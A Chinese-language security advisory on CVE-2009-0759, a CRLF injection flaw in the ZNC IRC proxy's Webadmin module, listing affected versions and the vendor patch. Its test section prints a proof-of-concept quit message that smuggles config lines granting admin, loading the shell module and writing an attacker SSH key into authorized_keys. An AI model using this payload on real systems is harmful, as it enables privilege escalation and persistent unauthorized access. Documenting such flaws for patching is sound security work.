发布日期：2009-02-24
更新日期：2009-03-04

受影响系统：

ZNC ZNC < 0.066

不受影响系统：

ZNC ZNC 0.066

描述：

---

BUGTRAQ  ID: 33899
CVE ID: CVE-2009-0759

ZNC是一个IRC代理，允许用户从工作站登录到IRC服务器。

ZNC的Webadmin模块中存在多个回车换行符注入（CRLF）漏洞。通过认证的远程攻击者可以修改znc.conf配置文件并在quit消息中注入CRLF序列导致以提升的权限执行任意代码。

<*来源：cnu
  
  链接：http://znc.svn.sourceforge.net/viewvc/znc?view=rev&sortby=rev&sortdir=down&revision=1395
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Some quit message
  Admin = true
  LoadModule = shell
  </User>
  ISpoofFile = /home/<user>/.ssh/authorited_keys
  ISpoofFormat = <some ssh key>
  <User a>

建议：

---

厂商补丁：

ZNC
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://downloads.sourceforge.net/znc/znc-0.066.tar.gz?use_mirror=garr

浏览次数：2351
严重程度：0（网友投票）